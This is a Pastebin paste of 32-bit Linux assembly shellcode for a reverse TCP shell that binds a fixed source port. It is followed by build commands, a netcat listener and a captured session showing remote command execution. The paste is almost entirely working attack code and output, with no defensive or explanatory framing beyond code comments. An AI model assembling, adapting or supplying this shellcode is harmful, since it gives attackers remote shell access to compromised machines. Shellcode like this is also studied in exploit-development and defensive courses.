API tools faq
paste
Advertisement
SH1NU11b1

#Reverse TCP bind shell setting source port

SH1NU11b1
Dec 4th, 2015
105
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1. SERVER# cat sc.asm
  2. BITS 32
  3. section .txt
  4. global _start
  5. _start:
  6. ; sockfd=socket(AF_INET,SOCK_STREAM,0)
  7. ; sockfd=socket(2,1,0)
  8. push byte 0x66 ; socketcall number (102)
  9. pop eax
  10. cdq ; xor edx,edx
  11. xor ebx,ebx
  12. inc ebx ; ebx=0x00000001 (socket)
  13. push edx ; edx=0x00000000
  14. push byte 0x01
  15. push byte 0x02
  16. mov ecx,esp
  17. int 0x80 ; system call
  18. xchg esi,eax
  19. ; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  20. ; bind(sockfd,[2,4321,0],16)
  21. push byte 0x66 ; socketcall number (102)
  22. pop eax
  23. inc ebx ; ebx=0x00000002 (bind)
  24. push edx ; edx=0x00000000 (Any available source IP)
  25. push word 0xe110 ; source port = 4321
  26. push word bx ; 0x0002
  27. mov ecx,esp
  28. push byte 0x10 ; 16
  29. push ecx
  30. push esi
  31. mov ecx,esp
  32. int 0x80 ; system call
  33. ; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  34. ; connect(sockfd,[2,1234,127.0.0.1],16)
  35. push byte 0x66 ; socketcall number (102)
  36. pop eax
  37. push dword 0x01bbbb7f ; 127.187.187.1
  38. xor ecx,ecx
  39. mov word [esp+1],cx ; destination ip = 127.0.0.1
  40. push word 0xd204 ; destination port = 1234
  41. push word bx ; 0x0002
  42. mov ecx,esp
  43. push byte 0x10 ; 16
  44. push ecx
  45. push esi
  46. mov ecx,esp
  47. inc ebx ; ebx=0x00000003 (connect)
  48. int 0x80 ; system call
  49. xchg ebx,esi
  50. ; dup2(cfd,i)
  51. push byte 0x2
  52. pop ecx
  53. dup_loop:
  54. mov byte al,0x3f ; dup2 number (63)
  55. int 0x80 ; system call
  56. dec ecx
  57. jns dup_loop
  58. ; execve("/bin/sh",shell,NULL)
  59. xor eax,eax
  60. mov byte al,11 ; system call number
  61. push edx ; \0
  62. push long 0x68732f2f ; hs//
  63. push long 0x6e69622f ; nib/
  64. mov ebx,esp ; first parameter
  65. push edx
  66. mov edx,esp ; third parameter
  67. push ebx
  68. mov ecx,esp ; second parameter
  69. int 0x80 ; system call
  70.  
  71. SERVER# nasm -f elf sc.asm && ld -o sc sc.o
  72. CLIENT# nc -lv 127.0.0.1 1234
  73. SERVER# ./sc
  74.  
  75. Connection from [127.0.0.1] port 1234 [tcp/*] accepted (family 2, sport 4321)
  76. hostname
  77. SERVER
  78. exit
  79. CLIENT#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!